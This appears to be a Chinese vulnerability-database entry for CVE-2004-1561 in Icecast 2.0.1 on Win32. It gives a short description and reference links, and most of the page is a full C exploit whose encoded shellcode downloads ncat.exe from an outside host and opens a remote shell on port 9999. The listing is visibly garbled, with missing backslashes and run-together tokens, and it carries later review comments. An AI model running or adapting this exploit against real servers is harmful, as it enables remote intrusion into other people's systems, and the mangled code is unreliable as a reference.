Icecast远程任意指令执行漏洞


漏洞ID 1108213 漏洞类型 边界条件错误
发布时间 2004-10-06 更新时间 2005-10-20
CVE编号 CVE-2004-1561
CNNVD-ID CNNVD-200412-498
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/568
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-498
|漏洞详情
Icecast是一款免费开放源代码的音频流服务程序，可用于多种Unix/Linux操作系统平台，也可用于Microsoft Windows操作系统。Icecast对HTTP头字段数据缺少充分检查，远程攻击者可以利用该漏洞以服务进程权限在系统上执行任意指令。Icecast Server最多接受客户端带有32个头字段的HTTP请求，在某些环境下(Win32)第32个头字段会覆盖函数的返回地址。也就是说，攻击者只需使用普通的HTTP请求加上31个头字段，再加上SHELLCODE，就可能无需跳转/调用寄存器或地址或使用其他手段而在主机上执行任意指令。
|漏洞EXP
/* 

by Luigi Auriemma 

Shellcode add-on by Delikon 
www.Delikon.de 

Because of all the forbidden bytes in a http get request 
i had to use a very small shellcode, which was blown up 
by Msf::Encoder::PexAlphaNum. Great encoder. 
------------------------------------------------------------------------- 
C:>iceexec 127.0.0.1 

Icecast <= 2.0.1 Win32 remote code execution 0.1 
by Luigi Auriemma 
e-mail: [email protected] 
web:http://aluigi.altervista.org 

shellcode add-on by Delikon 
www.delikon.de 

- target 127.0.0.1:8000 
- send malformed data 

Server IS vulnerable!!! 


C:>nc 127.0.0.1 9999 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:Icecast2 Win32> 
--------------------------------------------------------------------------- 


*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 

#ifdef WIN32 
#pragma comment(lib, "ws2_32.lib") 
    #include <winsock.h> 
    #include "winerr.h" 

    #define close closesocket 
#else 
    #include <unistd.h> 
    #include <sys/socket.h> 
    #include <sys/types.h> 
    #include <arpa/inet.h> 
    #include <netdb.h> 
    #include <netinet/in.h> 
#endif 

#define VER "0.1" 
#define PORT 8000 
#define BUFFSZ2048 
#define TIMEOUT 3 
#define EXEC"GET / HTTP/1.0rn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "xcc" 
//web download and execution shellcode 
//which downloads http://www.elitehaven.net/ncat.exe 
//this ncat spawns a shell on port 9999 
char shellcode[] = "xEB" 
"x03x59xEBx05xE8xF8xFFxFFxFFx4Fx49x49x49x49x49x49x51x5Ax56x54" 
"x58x36x33x30x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56" 
"x58x32x42x44x42x48x34x41x32x41x44x30x41x44x54x42x44x51x42x30" 
"x41x44x41x56x58x34x5Ax38x42x44x4Ax4Fx4Dx49x4Ex4Ex4Cx42x30x42" 
"x50x42x50x4Fx35x4Ax4Ex48x55x42x50x42x30x42x50x49x48x43x4Cx42" 
"x45x4Ax46x50x58x50x34x50x50x4Ex4Ex4Ax4Ex42x36x42x50x42x30x42" 
"x30x41x43x49x4Cx48x56x49x4Bx4Fx36x50x46x41x55x4Ax56x45x57x44" 
"x57x4Ex36x4Dx46x46x55x4Fx4Fx42x4Dx42x45x4Ax46x48x43x4Cx41x4F" 
"x32x42x57x4Ax4Ex48x44x42x50x42x30x42x30x41x43x49x4Cx41x55x41" 
"x35x4Dx48x47x53x48x55x4Dx38x47x47x4Ax50x48x35x41x35x4Fx4Fx42" 
"x4Dx43x55x4Ax56x4Ax59x50x4Fx4Cx38x50x30x4Ax4Ex4Dx32x42x50x42" 
"x30x42x30x41x55x47x35x4Fx4Fx42x4Dx41x53x49x4Cx49x34x44x4Ex50" 
"x4Fx43x35x4Ax46x50x37x4Ax4Dx44x4Ex43x47x4Ax4Ex49x41x42x30x42" 
"x50x42x30x4Fx4Fx42x4Dx45x55x48x55x46x46x41x4Ax42x53x42x30x42" 
"x30x42x30x4Bx48x42x44x4Ex30x4Bx58x42x37x4Ex51x4Dx4Ax4Bx48x4A" 
"x56x4Ax30x49x58x4Ax4Ex50x45x4Dx55x43x4Cx43x35x45x45x48x55x47" 
"x35x4Bx48x4Ex46x46x42x4Ax31x4Bx58x45x54x4Ex33x4Bx58x46x35x45" 
"x30x4Ax57x41x50x4Cx4Ex4Bx38x4Cx34x4Ax41x4Bx58x4Cx55x42x52x41" 
"x50x4Bx4Ex43x4Ex45x43x49x54x4Bx48x46x53x4Bx48x41x50x50x4Ex41" 
"x53x4Fx4Fx4Ex4Fx41x43x42x4Cx4Ex4Ax4Ax43x42x4Ex46x37x47x50x41" 
"x4Cx4Fx4Cx4Dx50x41x30x47x4Cx4Bx4Ex44x4Fx4Bx33x4Ex37x46x52x46" 
"x51x45x47x41x4Ex4Bx48x4Cx35x46x42x41x50x4Bx4Ex48x56x4Bx58x4E" 
"x50x4Bx44x4Bx58x4Cx55x4Ex31x41x30x4Bx4Ex4Bx48x46x50x4Bx58x41" 
"x30x4Ax4Ex49x4Ex44x30x42x50x42x50x42x50x41x53x42x4Cx49x58x4C" 
"x4Ex4Fx55x50x35x4Dx45x4Bx55x43x4Cx4Ax4Ex4Fx42x4Fx4Fx4Fx4Fx4F" 
"x4Fx4Dx36x4Ax46x4Ax56x50x52x45x56x4Ax57x45x46x42x30x4Ax56x46" 
"x47x46x57x42x57x4Cx43x4Fx42x4Fx32x47x47x47x47x47x47x50x42x45" 
"x36x4Ex56x49x36x46x57x45x56x4Ax36x41x36x48x57x45x36x50x56x50" 
"x32x50x46x45x36x46x47x4Fx42x50x46x43x36x41x56x46x37x50x32x45" 
"x36x4Ax37x45x46x42x50x5A"; 


/* 
in my example 0xcc is used to interrupt the code execution, you must 
put your shellcode exactly there. 
You don't need to call a shellcode offset (CALL ESP, JMP ESP and so 
on) or doing any other annoying operation because the code flow 
points directly there!!! 
Cool and easy 8-) 
*/ 


/*
 * Initialise Winsock 2.0 and return WSAStartup()'s status (0 on success).
 * WSADATA/WSAStartup come from <winsock.h>, which this file includes only
 * under WIN32, yet the definition itself is not guarded -- a non-Windows
 * build fails to compile here.  main() discards the return value, so a
 * failed initialisation is not reported.
 */
int startWinsock(void) 
{ 
  WSADATA wsa; 
  return WSAStartup(MAKEWORD(2,0),&wsa); 
} 

int timeout(int sock); 
u_long resolv(char *host); 
void std_err(void); 

/*
 * Entry point.  Prints the banner, takes <server> [port] from argv,
 * assembles the request (EXEC with its 0xcc placeholder replaced by
 * `shellcode`), sends it once over TCP and prints a verdict.
 *
 * The verdict is a liveness heuristic, not proof of anything: no reply
 * within TIMEOUT seconds, or a failed recv(), is printed as "vulnerable";
 * any reply (including an immediate close, which makes recv() return 0)
 * as "not vulnerable".  A slow or filtered server therefore yields a
 * false positive.  On the defensive side, the request shape itself --
 * 31 one-byte header lines followed by non-text bytes -- is easy to
 * match in a reverse proxy or IDS, and a proxy that caps header count
 * never lets it reach the server.
 *
 * NOTE(review): this listing is a lossy extraction of the original;
 * backslashes and some spaces are missing ("rn", "structsockaddr_in",
 * "u_charbuff[BUFFSZ]"), so it is not valid C as printed.
 */
int main(int argc, char *argv[]) { 
    structsockaddr_in peer; 
    int sd; 
    u_short port = PORT; 
    u_charbuff[BUFFSZ];          /* receive buffer for the reply probe only */
UCHAR buf[4096];                 /* request under construction; zeroed below */
UCHAR *pointer=NULL;             /* location of the 0xcc placeholder inside buf */


    setbuf(stdout, NULL);        /* unbuffered stdout so progress lines appear immediately */

    fputs("n" 
        "Icecast <= 2.0.1 Win32 remote code execution "VER"n" 
        "by Luigi Auriemman" 
        "e-mail: [email protected]" 
        "web:http://aluigi.altervista.orgn" 
  "nshellcode add-on by Delikonn" 
  "www.delikon.de" 
        "n", stdout); 

    if(argc < 2) { 
        printf("nUsage: %s <server> [port(%d)]n" 
            "n" 
            "Note: This exploit will force the Icecast server to download NCATn" 
            "and after execution it will spwan a shell on 9999n" 
            "n", argv[0], PORT); 
        exit(1); 
    } 

#ifdef WIN32 

    startWinsock();              /* return value (WSAStartup status) is ignored */
#endif 

    /* atoi() does no validation: non-numeric -> 0, values > 65535 are
     * truncated by the u_short assignment. */
    if(argc > 2) port = atoi(argv[2]); 

    peer.sin_addr.s_addr = resolv(argv[1]);   /* resolv() exits on lookup failure */
    peer.sin_port= htons(port); 
    peer.sin_family= AF_INET; 

    /* Build the request with strcpy/strcat and no check against sizeof buf;
     * this relies entirely on EXEC and shellcode being fixed-size. */
    memset(buf,0x00,sizeof(buf)); 
    strcpy(buf,EXEC); 
    
/* Last 0xcc byte in buf, i.e. the placeholder that ends EXEC.  strrchr()
 * returns NULL if the byte is absent, and the strcpy below would then
 * dereference NULL -- there is no check. */
pointer =strrchr(buf,0xcc); 

strcpy(pointer,shellcode);       /* overwrites the placeholder in place */

strcat(buf,"rn"); 
strcat(buf,"rn"); 
    

    printf("n- target %s:%hun", 
        inet_ntoa(peer.sin_addr), port); 

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if(sd < 0) std_err(); 

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) 
      < 0) std_err(); 

    fputs("- send malformed datan", stdout); 
    /* strlen() stops at the first NUL, so everything up to it is sent. */
    if(send(sd, buf, strlen(buf), 0) 
      < 0) std_err(); 

    /* Heuristic verdict: timeout (-1 from timeout()) or recv() error ->
     * "vulnerable"; a reply or an orderly close (recv() == 0) -> "not". */
    if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) { 
        fputs("nServer IS vulnerable!!!nn", stdout); 
    } else { 
        fputs("nServer doesn't seem vulnerablenn", stdout); 
    } 

    close(sd); 
    return(0); 
} 

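/*
 * Wait up to TIMEOUT seconds for `sock` to become readable.
 *
 * Returns 0 when the descriptor is readable (data or EOF pending) and
 * -1 when the wait expired.  A select() failure is fatal and is routed
 * through std_err(), which does not return.
 *
 * Note: on POSIX, select()/FD_SET cannot handle descriptors >= FD_SETSIZE
 * (FD_SET on such a value is undefined); callers must keep sock below it.
 * The original listing had its type names run together ("structtimeval",
 * "fd_setfd_read"); they are restored here.
 */
int timeout(int sock) {
    struct timeval tout = { .tv_sec = TIMEOUT, .tv_usec = 0 };
    fd_set fd_read;

    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    int err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();       /* fatal; does not return */
    return err ? 0 : -1;         /* 0 ready descriptors == timed out */
}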

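/*
 * Resolve `host` (dotted-quad or hostname) to an IPv4 address in network
 * byte order, the form main() stores in sin_addr.s_addr.
 *
 * A name that does not resolve (or resolves to something that is not a
 * 4-byte AF_INET address) is fatal: message on stdout, then exit(1).
 *
 * Notes: inet_addr() uses INADDR_NONE (255.255.255.255) as its error
 * value, so that literal falls through to the hostname lookup.
 * gethostbyname() is not reentrant.  The original read the address with
 * `*(u_long *)(hp->h_addr)`; h_addr points at a 4-byte in_addr while
 * u_long is 8 bytes on LP64 hosts, so that read ran past the end of it
 * (and violated alignment/aliasing rules) -- replaced by memcpy below.
 */
u_long resolv(char *host) {
    u_long host_ip = inet_addr(host);
    if(host_ip != INADDR_NONE) return(host_ip);

    struct hostent *hp = gethostbyname(host);
    if(!hp || hp->h_addrtype != AF_INET
           || hp->h_length != (int)sizeof(struct in_addr)) {
        printf("nError: Unable to resolve hostname (%s)n", host);
        exit(1);
    }
    struct in_addr addr;
    memcpy(&addr, hp->h_addr_list[0], sizeof addr);   /* exactly h_length bytes */
    return((u_long)addr.s_addr);
}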

#ifndef WIN32 
    /*
     * Fatal-error exit for the non-WIN32 build: print errno's message via
     * perror() and exit(1).  Never returns; main() and timeout() rely on
     * that after failed socket calls.  Under WIN32 the name presumably
     * comes from "winerr.h", which is included only there -- not visible
     * in this file.
     */
    void std_err(void) { 
        perror("nError"); 
        exit(1); 
    } 
#endif 

// milw0rm.com [2004-10-06]
|参考资料

来源:XF
名称:icecast-http-bo(17538)
链接:http://xforce.iss.net/xforce/xfdb/17538
来源:BID
名称:11271
链接:http://www.securityfocus.com/bid/11271
来源:SECUNIA
名称:12666
链接:http://secunia.com/advisories/12666/
来源:www.securiteam.com
链接:http://www.securiteam.com/exploits/6X00315BFM.html
来源:BUGTRAQ
名称:20041002 Re: 2. Code execution in Icecast 2.0.1 (exploit with shellcode)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109674593230539&w=2
来源:aluigi.altervista.org
链接:http://aluigi.altervista.org/adv/iceexec-adv.txt
来源:OSVDB
名称:10446
链接:http://www.osvdb.org/10446
来源:SECTRACK
名称:1011439
链接:http://securitytracker.com/id?1011439
来源:BUGTRAQ
名称:20040928 Code execution in Icecast 2.0.1
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109640005127644&w=2
来源:NSFOCUS
名称:6961
链接:http://www.nsfocus.net/vulndb/6961
